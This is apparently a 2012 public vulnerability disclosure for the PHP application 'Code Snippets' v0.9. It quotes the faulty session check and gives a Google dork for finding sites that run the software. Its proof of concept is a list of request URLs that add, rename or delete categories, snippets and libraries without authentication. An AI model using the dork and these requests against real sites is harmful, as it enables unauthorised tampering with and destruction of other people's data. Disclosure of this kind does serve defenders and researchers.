# --------------------------------------- # Author : L3b-r1'z Title : Code Snippets Version 0,9 insecure session Date : 6/30/2012 Email : L3br1z@Gmail.com Site : Sec4Ever.com & Exploit4arab.com Google Dork : allintext: "Powered by: PHP-CSL V0.9" Version : 1.1.0 [ 6/30/2012 ] - Vulnerability discovered [ 6/30/2012 ] - Vendor Contacted But No Response. [ 6/30/2012 ] - Public disclosure # --------------------------------------- # This PoC was written for educational purpose. Use it at your own risk. Author will be not responsible for any damage. # --------------------------------------- # 1) Bug 2) PoC # --------------------------------------- # 2) Bug : Look to file named config in line (120) to (138) if(!session_is_registered('phpcsl') && !isset($_GET['login']) && isset($_GET['act'])) { if(!$_GET['act'] == "session") { $ur = "index.php?login=y&q=".base64_encode(querystr()); header("Location: $ur"); } } // build URL querystring function querystr() { global $HTTP_GET_VARS; $q = ""; foreach($HTTP_GET_VARS as $n => $m) { $q .= "$n=$m&"; } return $q; } Here the file just secured the login page but not secured the add snip or edit or delete thats mean an attacker can add snippets or edit or delete or add category :D # --------------------------------------- # 3) PoC : http://localhost/codesnippets/index.php?op=cats&act=add - Add new Category http://localhost/codesnippets/index.php?op=snips&act=add - Add new snippets http://localhost/codesnippets/index.php?op=cats&act=edit - rename category http://localhost/codesnippets/index.php?op=cats&act=delete - delete category http://localhost/codesnippets/index.php?op=lib&act=add - add new library http://localhost/codesnippets/index.php?op=lib&act=edit - rename library http://localhost/codesnippets/index.php?op=lib&act=delete - delete library # --------------------------------------- # << EOF